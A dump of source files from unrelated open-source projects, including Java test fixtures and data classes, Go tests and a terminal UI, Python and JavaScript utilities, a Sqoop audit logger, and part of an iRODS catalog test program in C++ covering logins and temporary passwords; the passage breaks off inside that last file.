import org.estatio.dom.agreement.AgreementRoleTypeRepository;
import org.estatio.dom.communicationchannel.CommunicationChannel;
import org.estatio.dom.communicationchannel.CommunicationChannelType;
import org.estatio.dom.communicationchannel.CommunicationChannels;
import org.estatio.dom.lease.Lease;
import org.estatio.dom.lease.LeaseConstants;
import org.estatio.dom.lease.tags.BrandCoverage;
import org.estatio.dom.party.Party;
import org.estatio.fixture.asset.PropertyForOxfGb;
import org.estatio.fixture.geography.CountriesRefData;
import org.estatio.fixture.party.OrganisationForHelloWorldGb;
import org.estatio.fixture.party.OrganisationForTopModelGb;
import org.estatio.fixture.party.PersonForGinoVannelliGb;
import static org.estatio.integtests.VT.ld;
public class LeaseForOxfTopModel001Gb extends LeaseAbstract {
public static final String REF = "OXF-TOPMODEL-001";
public static final String UNIT_REF = PropertyForOxfGb.unitReference("001");
public static final String PARTY_REF_LANDLORD = OrganisationForHelloWorldGb.REF;
public static final String PARTY_REF_TENANT = OrganisationForTopModelGb.REF;
public static final String BRAND = "Topmodel";
public static final BrandCoverage BRAND_COVERAGE = BrandCoverage.NATIONAL;
public static final String COUNTRY_OF_ORIGIN_REF = CountriesRefData.GBR;
@Inject
private AgreementRoleTypeRepository agreementRoleTypeRepository;
@Inject
private AgreementRoleCommunicationChannelTypeRepository agreementRoleCommunicationChannelTypeRepository;
@Inject
private CommunicationChannels communicationChannels;
@Override
protected void execute(ExecutionContext executionContext) {
// prereqs
if (isExecutePrereqs()) {
executionContext.executeChild(this, new PersonForGinoVannelliGb());
executionContext.executeChild(this, new OrganisationForHelloWorldGb());
executionContext.executeChild(this, new OrganisationForTopModelGb());
executionContext.executeChild(this, new PersonForGinoVannelliGb());
executionContext.executeChild(this, new PropertyForOxfGb());
}
// exec
Party manager = parties.findPartyByReference(PersonForGinoVannelliGb.REF);
Lease lease = createLease(
REF,
"Topmodel Lease",
UNIT_REF,
BRAND,
BRAND_COVERAGE,
COUNTRY_OF_ORIGIN_REF,
"FASHION",
"WOMEN",
PARTY_REF_LANDLORD,
PARTY_REF_TENANT,
ld(2010, 7, 15),
ld(2022, 7, 14),
true,
true,
manager,
executionContext);
createAddress(lease, LeaseConstants.ARCCT_ADMINISTRATION_ADDRESS);
createAddress(lease, LeaseConstants.ARCCT_INVOICE_ADDRESS);
}
private void createAddress(Lease lease, String addressType) {
AgreementRole agreementRole = lease.findRoleWithType(agreementRoleTypeRepository.findByTitle(LeaseConstants.ART_TENANT), ld(2010, 7, 15));
AgreementRoleCommunicationChannelType agreementRoleCommunicationChannelType = agreementRoleCommunicationChannelTypeRepository
.findByTitle(addressType);
final SortedSet<CommunicationChannel> channels = communicationChannels.findByOwnerAndType(lease.getSecondaryParty(), CommunicationChannelType.POSTAL_ADDRESS);
final CommunicationChannel postalAddress = channels.first();
agreementRole.addCommunicationChannel(agreementRoleCommunicationChannelType, postalAddress, null);
}
}
|
DIMO-Network/benthos
|
internal/impl/pure/processor_log_test.go
|
package pure_test
import (
"fmt"
"reflect"
"testing"
"github.com/stretchr/testify/assert"
"github.com/stretchr/testify/require"
"github.com/benthosdev/benthos/v4/internal/bundle/mock"
"github.com/benthosdev/benthos/v4/internal/log"
"github.com/benthosdev/benthos/v4/internal/message"
"github.com/benthosdev/benthos/v4/internal/old/processor"
)
type mockLog struct {
traces []string
debugs []string
infos []string
warns []string
errors []string
fields []map[string]string
mappingFields []interface{}
}
func (m *mockLog) NewModule(prefix string) log.Modular { return m }
func (m *mockLog) WithFields(fields map[string]string) log.Modular {
m.fields = append(m.fields, fields)
return m
}
func (m *mockLog) With(args ...interface{}) log.Modular {
m.mappingFields = append(m.mappingFields, args...)
return m
}
func (m *mockLog) Fatalf(format string, v ...interface{}) {}
func (m *mockLog) Errorf(format string, v ...interface{}) {
m.errors = append(m.errors, fmt.Sprintf(format, v...))
}
func (m *mockLog) Warnf(format string, v ...interface{}) {
m.warns = append(m.warns, fmt.Sprintf(format, v...))
}
func (m *mockLog) Infof(format string, v ...interface{}) {
m.infos = append(m.infos, fmt.Sprintf(format, v...))
}
func (m *mockLog) Debugf(format string, v ...interface{}) {
m.debugs = append(m.debugs, fmt.Sprintf(format, v...))
}
func (m *mockLog) Tracef(format string, v ...interface{}) {
m.traces = append(m.traces, fmt.Sprintf(format, v...))
}
func (m *mockLog) Fatalln(message string) {}
func (m *mockLog) Errorln(message string) {
m.errors = append(m.errors, message)
}
func (m *mockLog) Warnln(message string) {
m.warns = append(m.warns, message)
}
func (m *mockLog) Infoln(message string) {
m.infos = append(m.infos, message)
}
func (m *mockLog) Debugln(message string) {
m.debugs = append(m.debugs, message)
}
func (m *mockLog) Traceln(message string) {
m.traces = append(m.traces, message)
}
func TestLogBadLevel(t *testing.T) {
conf := processor.NewConfig()
conf.Type = "log"
conf.Log.Level = "does not exist"
if _, err := mock.NewManager().NewProcessor(conf); err == nil {
t.Error("expected err from bad log level")
}
}
func TestLogLevelTrace(t *testing.T) {
conf := processor.NewConfig()
conf.Type = "log"
conf.Log.Message = "${!json(\"foo\")}"
logMock := &mockLog{}
levels := []string{"TRACE", "DEBUG", "INFO", "WARN", "ERROR"}
for _, level := range levels {
conf.Log.Level = level
mgr := mock.NewManager()
mgr.L = logMock
l, err := mgr.NewProcessor(conf)
if err != nil {
t.Fatal(err)
}
input := message.QuickBatch([][]byte{[]byte(fmt.Sprintf(`{"foo":"%v"}`, level))})
expMsgs := []*message.Batch{input}
actMsgs, res := l.ProcessMessage(input)
if res != nil {
t.Fatal(res)
}
if !reflect.DeepEqual(expMsgs, actMsgs) {
t.Errorf("Wrong message passthrough: %v != %v", actMsgs, expMsgs)
}
}
if exp, act := []string{"TRACE"}, logMock.traces; !reflect.DeepEqual(exp, act) {
t.Errorf("Wrong log for trace: %v != %v", act, exp)
}
if exp, act := []string{"DEBUG"}, logMock.debugs; !reflect.DeepEqual(exp, act) {
t.Errorf("Wrong log for debug: %v != %v", act, exp)
}
if exp, act := []string{"INFO"}, logMock.infos; !reflect.DeepEqual(exp, act) {
t.Errorf("Wrong log for info: %v != %v", act, exp)
}
if exp, act := []string{"WARN"}, logMock.warns; !reflect.DeepEqual(exp, act) {
t.Errorf("Wrong log for warn: %v != %v", act, exp)
}
if exp, act := []string{"ERROR"}, logMock.errors; !reflect.DeepEqual(exp, act) {
t.Errorf("Wrong log for error: %v != %v", act, exp)
}
}
func TestLogWithFields(t *testing.T) {
conf := processor.NewConfig()
conf.Type = "log"
conf.Log.Message = "${!json(\"foo\")}"
conf.Log.Fields = map[string]string{
"static": "foo",
"dynamic": "${!json(\"bar\")}",
}
logMock := &mockLog{}
conf.Log.Level = "INFO"
mgr := mock.NewManager()
mgr.L = logMock
l, err := mgr.NewProcessor(conf)
if err != nil {
t.Fatal(err)
}
input := message.QuickBatch([][]byte{[]byte(`{"foo":"info message","bar":"with fields"}`)})
expMsgs := []*message.Batch{input}
actMsgs, res := l.ProcessMessage(input)
if res != nil {
t.Fatal(res)
}
if !reflect.DeepEqual(expMsgs, actMsgs) {
t.Errorf("Wrong message passthrough: %v != %v", actMsgs, expMsgs)
}
if exp, act := []string{"info message"}, logMock.infos; !reflect.DeepEqual(exp, act) {
t.Errorf("Wrong log output: %v != %v", act, exp)
}
t.Logf("Checking %v\n", logMock.fields)
if exp, act := 1, len(logMock.fields); exp != act {
t.Fatalf("Wrong count of fields: %v != %v", act, exp)
}
if exp, act := map[string]string{"dynamic": "with fields", "static": "foo"}, logMock.fields[0]; !reflect.DeepEqual(exp, act) {
t.Errorf("Wrong field output: %v != %v", act, exp)
}
input = message.QuickBatch([][]byte{[]byte(`{"foo":"info message 2","bar":"with fields 2"}`)})
expMsgs = []*message.Batch{input}
actMsgs, res = l.ProcessMessage(input)
if res != nil {
t.Fatal(res)
}
if !reflect.DeepEqual(expMsgs, actMsgs) {
t.Errorf("Wrong message passthrough: %v != %v", actMsgs, expMsgs)
}
if exp, act := []string{"info message", "info message 2"}, logMock.infos; !reflect.DeepEqual(exp, act) {
t.Errorf("Wrong log output: %v != %v", act, exp)
}
t.Logf("Checking %v\n", logMock.fields)
if exp, act := 2, len(logMock.fields); exp != act {
t.Fatalf("Wrong count of fields: %v != %v", act, exp)
}
if exp, act := map[string]string{"dynamic": "with fields", "static": "foo"}, logMock.fields[0]; !reflect.DeepEqual(exp, act) {
t.Errorf("Wrong field output: %v != %v", act, exp)
}
if exp, act := map[string]string{"dynamic": "with fields 2", "static": "foo"}, logMock.fields[1]; !reflect.DeepEqual(exp, act) {
t.Errorf("Wrong field output: %v != %v", act, exp)
}
}
func TestLogWithFieldsMapping(t *testing.T) {
conf := processor.NewConfig()
conf.Type = "log"
conf.Log.Message = "hello world"
conf.Log.FieldsMapping = `
root.static = "static value"
root.age = this.age + 2
root.is_cool = this.is_cool`
logMock := &mockLog{}
conf.Log.Level = "INFO"
mgr := mock.NewManager()
mgr.L = logMock
l, err := mgr.NewProcessor(conf)
require.NoError(t, err)
input := message.QuickBatch([][]byte{[]byte(
`{"age":10,"is_cool":true,"ignore":"this value please"}`,
)})
expMsgs := []*message.Batch{input}
actMsgs, res := l.ProcessMessage(input)
require.Nil(t, res)
assert.Equal(t, expMsgs, actMsgs)
assert.Equal(t, []string{"hello world"}, logMock.infos)
assert.Equal(t, []interface{}{
"age", int64(12),
"is_cool", true,
"static", "static value",
}, logMock.mappingFields)
}
|
jayavigneshksd/yavijava
|
src/main/java/com/vmware/vim25/HostStorageDeviceInfo.java
|
<gh_stars>100-1000
/*================================================================================
Copyright (c) 2013 <NAME>. All Rights Reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of VMware, Inc. nor the names of its contributors may be used
to endorse or promote products derived from this software without specific prior
written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
IN NO EVENT SHALL VMWARE, INC. OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
================================================================================*/
package com.vmware.vim25;
/**
* @author <NAME> (http://www.doublecloud.org)
* @version 5.1
*/
@SuppressWarnings("all")
public class HostStorageDeviceInfo extends DynamicData {
public HostHostBusAdapter[] hostBusAdapter;
public ScsiLun[] scsiLun;
public HostScsiTopology scsiTopology;
public HostMultipathInfo multipathInfo;
public HostPlugStoreTopology plugStoreTopology;
public boolean softwareInternetScsiEnabled;
public HostHostBusAdapter[] getHostBusAdapter() {
return this.hostBusAdapter;
}
public ScsiLun[] getScsiLun() {
return this.scsiLun;
}
public HostScsiTopology getScsiTopology() {
return this.scsiTopology;
}
public HostMultipathInfo getMultipathInfo() {
return this.multipathInfo;
}
public HostPlugStoreTopology getPlugStoreTopology() {
return this.plugStoreTopology;
}
public boolean isSoftwareInternetScsiEnabled() {
return this.softwareInternetScsiEnabled;
}
public void setHostBusAdapter(HostHostBusAdapter[] hostBusAdapter) {
this.hostBusAdapter = hostBusAdapter;
}
public void setScsiLun(ScsiLun[] scsiLun) {
this.scsiLun = scsiLun;
}
public void setScsiTopology(HostScsiTopology scsiTopology) {
this.scsiTopology = scsiTopology;
}
public void setMultipathInfo(HostMultipathInfo multipathInfo) {
this.multipathInfo = multipathInfo;
}
public void setPlugStoreTopology(HostPlugStoreTopology plugStoreTopology) {
this.plugStoreTopology = plugStoreTopology;
}
public void setSoftwareInternetScsiEnabled(boolean softwareInternetScsiEnabled) {
this.softwareInternetScsiEnabled = softwareInternetScsiEnabled;
}
}
|
twpayne/charm
|
ui/link/link.go
|
<gh_stars>1000+
package link
import (
"fmt"
"github.com/charmbracelet/bubbles/spinner"
tea "github.com/charmbracelet/bubbletea"
"github.com/charmbracelet/charm/client"
"github.com/charmbracelet/charm/ui/charmclient"
"github.com/charmbracelet/charm/ui/common"
"github.com/charmbracelet/charm/ui/keygen"
"github.com/charmbracelet/lipgloss"
)
var viewStyle = lipgloss.NewStyle().Padding(1, 2, 2, 3)
// NewProgram returns a Tea program for the link participant.
func NewProgram(cfg *client.Config, code string) *tea.Program {
return tea.NewProgram(newModel(cfg, code))
}
type status int
const (
initCharmClient status = iota
keygenRunning
keygenFinished
linkInit
linkTokenSent
linkTokenValid
linkTokenInvalid
linkRequestDenied
linkSuccess
linkTimeout
linkErr
quitting
)
type (
tokenSentMsg struct{}
validTokenMsg bool
requestDeniedMsg struct{}
successMsg bool
timeoutMsg struct{}
errMsg struct{ err error }
)
type model struct {
lh *linkHandler
cfg *client.Config
cc *client.Client
styles common.Styles
code string
status status
alreadyLinked bool
err error
spinner spinner.Model
keygen keygen.Model
}
func newModel(cfg *client.Config, code string) model {
return model{
lh: newLinkHandler(),
cfg: cfg,
styles: common.DefaultStyles(),
code: code,
status: initCharmClient,
alreadyLinked: false,
err: nil,
spinner: common.NewSpinner(),
}
}
func (m model) Init() tea.Cmd {
return tea.Batch(
charmclient.NewClient(m.cfg),
spinner.Tick,
)
}
func (m model) Update(msg tea.Msg) (tea.Model, tea.Cmd) {
switch msg := msg.(type) {
case tea.KeyMsg:
switch msg.String() {
case "ctrl+c", "esc", "q":
m.status = quitting
return m, tea.Quit
default:
return m, nil
}
case charmclient.NewClientMsg:
m.cc = msg
m.status = linkInit
return m, handleLinkRequest(m)
case charmclient.ErrMsg:
m.err = msg.Err
return m, tea.Quit
case charmclient.SSHAuthErrorMsg:
if m.status == initCharmClient {
m.status = keygenRunning
m.keygen = keygen.NewModel()
return m, keygen.GenerateKeys(m.cfg.Host)
}
m.err = msg.Err
return m, tea.Quit
case keygen.DoneMsg:
m.status = keygenFinished
return m, charmclient.NewClient(m.cfg)
case tokenSentMsg:
m.status = linkTokenSent
return m, nil
case validTokenMsg:
if msg {
m.status = linkTokenValid
return m, nil
}
m.status = linkTokenInvalid
return m, tea.Quit
case requestDeniedMsg:
m.status = linkRequestDenied
return m, tea.Quit
case successMsg:
m.status = linkSuccess
if msg {
m.alreadyLinked = true
}
return m, tea.Quit
case timeoutMsg:
m.status = linkTimeout
return m, tea.Quit
case errMsg:
m.status = linkErr
return m, tea.Quit
case spinner.TickMsg:
var cmd tea.Cmd
m.spinner, cmd = m.spinner.Update(msg)
return m, cmd
default:
if m.status == keygenRunning {
newModel, cmd := m.keygen.Update(msg)
keygenModel, ok := newModel.(keygen.Model)
if !ok {
panic("could not perform assertion on keygen model")
}
m.keygen = keygenModel
return m, cmd
}
return m, nil
}
}
func (m model) View() string {
if m.err != nil {
return viewStyle.Render(m.err.Error())
}
s := m.spinner.View() + " "
switch m.status {
case initCharmClient:
s += "Initializing..."
case keygenRunning:
if m.keygen.Status != keygen.StatusSuccess {
s += m.keygen.View()
} else {
s = m.keygen.View()
}
case linkInit:
s += "Linking..."
case linkTokenSent:
s += fmt.Sprintf("Token %s. Waiting for validation...", m.styles.Keyword.Render("sent"))
case linkTokenValid:
s += fmt.Sprintf("Token %s. Waiting for authorization...", m.styles.Keyword.Render("valid"))
case linkTokenInvalid:
s = fmt.Sprintf("%s token. Goodbye.", m.styles.Keyword.Render("Invalid"))
case linkRequestDenied:
s = fmt.Sprintf("Link request %s. Sorry, kid.", m.styles.Keyword.Render("denied"))
case linkSuccess:
s = m.styles.Keyword.Render("Linked!")
if m.alreadyLinked {
s += " You already linked this key, btw."
}
case linkTimeout:
s = fmt.Sprintf("Link request %s. Sorry.", m.styles.Keyword.Render("timed out"))
case linkErr:
s = m.styles.Keyword.Render("Error.")
case quitting:
s = "Oh, ok. Bye."
}
return viewStyle.Render(s)
}
func handleLinkRequest(m model) tea.Cmd {
go func() {
if err := m.cc.Link(m.lh, m.code); err != nil {
m.lh.err <- err
}
}()
return tea.Batch(
handleTokenSent(m.lh),
handleValidToken(m.lh),
handleRequestDenied(m.lh),
handleLinkSuccess(m.lh),
handleTimeout(m.lh),
handleErr(m.lh),
)
}
func handleTokenSent(lh *linkHandler) tea.Cmd {
return func() tea.Msg {
<-lh.tokenSent
return tokenSentMsg{}
}
}
func handleValidToken(lh *linkHandler) tea.Cmd {
return func() tea.Msg {
return validTokenMsg(<-lh.validToken)
}
}
func handleRequestDenied(lh *linkHandler) tea.Cmd {
return func() tea.Msg {
<-lh.requestDenied
return requestDeniedMsg{}
}
}
func handleLinkSuccess(lh *linkHandler) tea.Cmd {
return func() tea.Msg {
return successMsg(<-lh.success)
}
}
func handleTimeout(lh *linkHandler) tea.Cmd {
return func() tea.Msg {
<-lh.timeout
return timeoutMsg{}
}
}
func handleErr(lh *linkHandler) tea.Cmd {
return func() tea.Msg {
return errMsg{<-lh.err}
}
}
|
gaigeshen/wechat-mp
|
src/main/java/me/gaigeshen/wechat/mp/shakearound/statistics/PageBasedStatisticsBatchRequest.java
|
package me.gaigeshen.wechat.mp.shakearound.statistics;
import com.alibaba.fastjson.annotation.JSONField;
import lombok.Builder;
import me.gaigeshen.wechat.mp.Request;
/**
* 批量查询页面统计数据
*
* @author gaigeshen
*/
@Builder
public class PageBasedStatisticsBatchRequest implements Request<PageBasedStatisticsBatchResponse> {
private long date;
@JSONField(name = "page_index")
private int pageIndex;
@Override
public String requestUri() {
return "https://api.weixin.qq.com/shakearound/statistics/pagelist?access_token=ACCESS_TOKEN";
}
}
|
dchaplinsky/ragoogle
|
mbu/loader.py
|
from abstract.loaders import FileLoader
class MbuLoader(FileLoader):
filetype = "mongo"
mongo_collection = "kga_gov_ua"
last_updated_param_is_required = False
last_updated_path = "order_date"
@property
def model(self):
from .models import MbuModel
return MbuModel
def preprocess(self, record, options):
assert set(self.get_dedup_fields()).issubset(
record.keys()
)
return record
def get_dedup_fields(self):
return ["order_date", "order_no"]
|
TwFlem/react-cosmos
|
packages/react-cosmos/src/server/web/webpack/attach-webpack.js
|
// @flow
import path from 'path';
import promisify from 'util.promisify';
import webpackDevMiddleware from 'webpack-dev-middleware';
import webpackHotMiddleware from 'webpack-hot-middleware';
import { getRootUrl } from '../../shared/server';
import enhanceWebpackConfig from './enhance-webpack-config';
import type { Config } from 'react-cosmos-flow/config';
export function attachWebpack({
cosmosConfig,
app,
webpack,
userWebpackConfig
}: {
cosmosConfig: Config,
app: express$Application,
webpack: Function,
userWebpackConfig: Object
}) {
const { publicUrl, hot } = cosmosConfig;
const loaderWebpackConfig = enhanceWebpackConfig({
webpack,
userWebpackConfig
});
const webpackCompiler = webpack(loaderWebpackConfig);
webpackCompiler.plugin('invalid', filePath => {
// Old versions of webpack call this hook without a file path argument
if (typeof filePath === 'string') {
const relFilePath = path.relative(process.cwd(), filePath);
console.log('[Cosmos] webpack build invalidated by', relFilePath);
}
});
const onWebpackDone = new Promise(resolve =>
webpackCompiler.plugin('done', resolve)
);
console.log('[Cosmos] Building webpack...');
const wdmInst = webpackDevMiddleware(webpackCompiler, {
// publicPath is the base path for the webpack assets and has to match
// webpack.output.path
publicPath: getRootUrl(publicUrl),
logLevel: 'warn'
});
app.use(wdmInst);
if (hot) {
app.use(webpackHotMiddleware(webpackCompiler));
}
function stopWebpack() {
return promisify(wdmInst.close.bind(wdmInst))();
}
return { onWebpackDone, stopWebpack };
}
|
pengan1990/sqoop-on-spark
|
core/src/main/java/org/apache/sqoop/audit/AuditLoggerManager.java
|
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.sqoop.audit;
import org.apache.log4j.Logger;
import org.apache.sqoop.common.MapContext;
import org.apache.sqoop.common.SqoopException;
import org.apache.sqoop.core.Reconfigurable;
import org.apache.sqoop.core.SqoopConfiguration;
import org.apache.sqoop.core.SqoopConfiguration.CoreConfigurationListener;
import org.apache.sqoop.error.code.AuditLoggerError;
import org.apache.sqoop.utils.ClassUtils;
import java.util.ArrayList;
import java.util.List;
import java.util.Map;
public class AuditLoggerManager implements Reconfigurable {
/**
* Logger object for this class
*/
private static final Logger LOG = Logger.getLogger(AuditLoggerManager.class);
/**
* All audit loggers
*/
private List<AuditLogger> loggers;
/**
* Private instance to singleton of this class
*/
private static AuditLoggerManager instance;
/**
* Create default object
*/
static {
instance = new AuditLoggerManager();
}
/**
* Return current instance
*
* @return Current instance
*/
public static AuditLoggerManager getInstance() {
return instance;
}
/**
* Allows to set instance in case that it's need.
*
* @param newInstance New instance
*/
public void setInstance(AuditLoggerManager newInstance) {
instance = newInstance;
}
public AuditLoggerManager() {
loggers = new ArrayList<AuditLogger>();
}
public synchronized void initialize() {
LOG.info("Begin audit logger manager initialization");
initializeLoggers();
SqoopConfiguration.getInstance().getProvider()
.registerListener(new CoreConfigurationListener(this));
LOG.info("Audit logger manager initialized: OK");
}
private void initializeLoggers() {
loggers.clear();
MapContext context = SqoopConfiguration.getInstance().getContext();
Map<String, String> auditLoggerProps = context.getNestedProperties(
AuditLoggerConstants.PREFIX_AUDITLOGGER_CONFIG);
// Initialize audit loggers
for (String key : auditLoggerProps.keySet()) {
if (key.endsWith(AuditLoggerConstants.SUFFIX_AUDITLOGGER_CLASS)) {
String loggerName = key.substring(0, key.indexOf("."));
String loggerClassName = auditLoggerProps.get(key);
if (loggerClassName == null || loggerClassName.trim().length() == 0) {
throw new SqoopException(AuditLoggerError.AUDIT_0001,
"Logger name: " + loggerName);
}
Class<?> loggerClass =
ClassUtils.loadClass(loggerClassName);
if (loggerClass == null) {
throw new SqoopException(AuditLoggerError.AUDIT_0001,
"Logger Class: " + loggerClassName);
}
AuditLogger newLogger;
try {
newLogger = (AuditLogger) loggerClass.newInstance();
} catch (Exception ex) {
throw new SqoopException(AuditLoggerError.AUDIT_0001,
"Logger Class: " + loggerClassName, ex);
}
newLogger.setLoggerName(loggerName);
newLogger.initialize();
loggers.add(newLogger);
LOG.info("Audit Logger has been initialized: " + loggerName);
}
}
}
public synchronized void destroy() {
LOG.trace("Begin audit logger manager destroy");
}
public void logAuditEvent(String username,
String ip, String operation, String objectType, String objectId) {
for (AuditLogger logger : loggers) {
logger.logAuditEvent(username, ip, operation, objectType, objectId);
}
}
@Override
public void configurationChanged() {
LOG.info("Begin audit logger manager reconfiguring");
initializeLoggers();
LOG.info("Audit logger manager reconfigured");
}
}
|
iychoi/cyverse-irods
|
iRODS/server/test/src/test_chl.cpp
|
<reponame>iychoi/cyverse-irods
/*** Copyright (c), The Regents of the University of California ***
*** For more information please refer to files in the COPYRIGHT directory ***/
/*
ICAT test program.
*/
#include "rodsClient.h"
#include "parseCommandLine.h"
#include "readServerConfig.hpp"
#include "irods_server_properties.hpp"
#include "checksum.hpp"
#include "rodsUser.h"
#include "icatHighLevelRoutines.hpp"
//#include "icatMidLevelRoutines.hpp"
#include <string.h>
#include <string>
#include <boost/lexical_cast.hpp>
#include <limits>
extern icatSessionStruct *chlGetRcs();
/*
int testCml(rsComm_t *rsComm)
{
return cmlTest(rsComm);
}
*/
int testRegRule( rsComm_t *rsComm, char *name ) {
ruleExecSubmitInp_t ruleInfo;
memset( &ruleInfo, 0, sizeof( ruleInfo ) );
snprintf( ruleInfo.ruleName, sizeof( ruleInfo.ruleName ), "%s", name );
snprintf( ruleInfo.reiFilePath, sizeof( ruleInfo.reiFilePath ), "%s", "../config/packedRei/rei.file1" );
snprintf( ruleInfo.userName, sizeof( ruleInfo.userName ), "%s", "Wayne" );
snprintf( ruleInfo.exeAddress, sizeof( ruleInfo.exeAddress ), "%s", "Bermuda" );
snprintf( ruleInfo.exeTime, sizeof( ruleInfo.exeTime ), "%s", "whenEver" );
snprintf( ruleInfo.exeFrequency, sizeof( ruleInfo.exeFrequency ), "%s", "every 2 days" );
snprintf( ruleInfo.priority, sizeof( ruleInfo.priority ), "%s", "high" );
snprintf( ruleInfo.estimateExeTime, sizeof( ruleInfo.estimateExeTime ), "%s", "2 hours" );
snprintf( ruleInfo.notificationAddr, sizeof( ruleInfo.notificationAddr ), "%s", "<EMAIL>" );
return chlRegRuleExec( rsComm, &ruleInfo );
}
int testRename( rsComm_t *rsComm, char *id, char *newName ) {
rodsLong_t intId;
int status;
rsComm->clientUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
rsComm->proxyUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
intId = strtoll( id, 0, 0 );
status = chlRenameObject( rsComm, intId, newName );
if ( status ) {
return status;
}
return chlCommit( rsComm );
}
int testLogin( char *User, char *pw, char *pw1, rodsEnv& myEnv ) {
int status;
rcComm_t *Conn;
rErrMsg_t errMsg;
Conn = rcConnect( myEnv.rodsHost, myEnv.rodsPort, myEnv.rodsUserName,
myEnv.rodsZone, 0, &errMsg );
if ( Conn == NULL ) {
printf( "rcConnect failure" );
return -1;
}
status = clientLoginWithPassword( Conn, pw1 ); /* first login as self */
if ( status == 0 ) {
rstrcpy( Conn->clientUser.userName, User,
sizeof Conn->clientUser.userName );
rstrcpy( Conn->clientUser.rodsZone, myEnv.rodsZone,
sizeof Conn->clientUser.rodsZone ); /* default to our zone */
status = clientLoginWithPassword( Conn, pw ); /* then try other user */
}
rcDisconnect( Conn );
return status;
}
int testMove( rsComm_t *rsComm, char *id, char *destId ) {
rodsLong_t intId, intDestId;
int status;
rsComm->clientUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
rsComm->proxyUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
intId = strtoll( id, 0, 0 );
intDestId = strtoll( destId, 0, 0 );
status = chlMoveObject( rsComm, intId, intDestId );
if ( status ) {
return status;
}
return chlCommit( rsComm );
}
int testTempPw( rsComm_t *rsComm ) {
int status;
char pwValueToHash[500];
status = chlMakeTempPw( rsComm, pwValueToHash, "" );
printf( "pwValueToHash: %s\n", pwValueToHash );
return status;
}
int testTempPwConvert( char *s1, char *s2 ) {
char md5Buf[100];
unsigned char digest[RESPONSE_LEN + 2];
char digestStr[100];
/*
Calcuate the temp password: a hash of s1 (the user's main
password) and s2 (the value returned by chlGenTempPw).
*/
memset( md5Buf, 0, sizeof( md5Buf ) );
snprintf( md5Buf, sizeof( md5Buf ), "%s%s", s2, s1 );
obfMakeOneWayHash( HASH_TYPE_DEFAULT, ( unsigned char* )md5Buf, sizeof md5Buf,
digest );
hashToStr( digest, digestStr );
printf( "digestStr (derived temp pw)=%s\n", digestStr );
return 0;
}
int
testGetLocalZone( char *expectedZone ) {
std::string zone;
chlGetLocalZone( zone );
printf( "Zone is %s\n", zone.c_str() );
if ( zone != expectedZone ) {
return -1;
}
return 0;
}
int
testGetPamPw( rsComm_t *rsComm, char *username, char *testTime ) {
char *irodsPamPassword;
irodsPamPassword = ( char* )malloc( 100 );
memset( irodsPamPassword, 0, 100 );
int status = chlUpdateIrodsPamPassword( rsComm, username, 0, testTime,
&irodsPamPassword );
if ( status == 0 ) {
printf( "status=%d pw=%s \n", status, irodsPamPassword );
}
else {
printf( "status=%d\n", status );
}
return 0;
}
int testTempPwCombined( rsComm_t *rsComm, char *s1 ) {
int status;
char pwValueToHash[500];
char md5Buf[100];
unsigned char digest[RESPONSE_LEN + 2];
char digestStr[100];
status = chlMakeTempPw( rsComm, pwValueToHash, "" );
if ( status ) {
return status;
}
printf( "pwValueToHash: %s\n", pwValueToHash );
/*
Calcuate the temp password: a hash of s1 (the user's main
password) and the value returned by chlGenTempPw.
*/
memset( md5Buf, 0, sizeof( md5Buf ) );
snprintf( md5Buf, sizeof( md5Buf ), "%s%s", pwValueToHash, s1 );
obfMakeOneWayHash( HASH_TYPE_DEFAULT, ( unsigned char* )md5Buf, sizeof md5Buf,
digest );
hashToStr( digest, digestStr );
printf( "digestStr (derived temp pw)=%s\n", digestStr );
return 0;
}
int testTempPwForOther( rsComm_t *rsComm, char *s1, char *otherUser ) {
int status;
char pwValueToHash[500];
char md5Buf[100];
unsigned char digest[RESPONSE_LEN + 2];
char digestStr[100];
rsComm->clientUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
rsComm->proxyUser.authInfo.authFlag = LOCAL_PRIV_USER_AUTH;
status = chlMakeTempPw( rsComm, pwValueToHash, otherUser );
if ( status ) {
return status;
}
printf( "pwValueToHash: %s\n", pwValueToHash );
/*
Calcuate the temp password: a hash of s1 (the user's main
password) and the value returned by chlGenTempPw.
*/
memset( md5Buf, 0, sizeof( md5Buf ) );
snprintf( md5Buf, sizeof( md5Buf ), "%s%s", pwValueToHash, s1 );
obfMakeOneWayHash( HASH_TYPE_DEFAULT, ( unsigned char* )md5Buf, sizeof md5Buf,
digest );
hashToStr( digest, digestStr );
printf( "digestStr (derived temp pw)=%s\n", digestStr );
return 0;
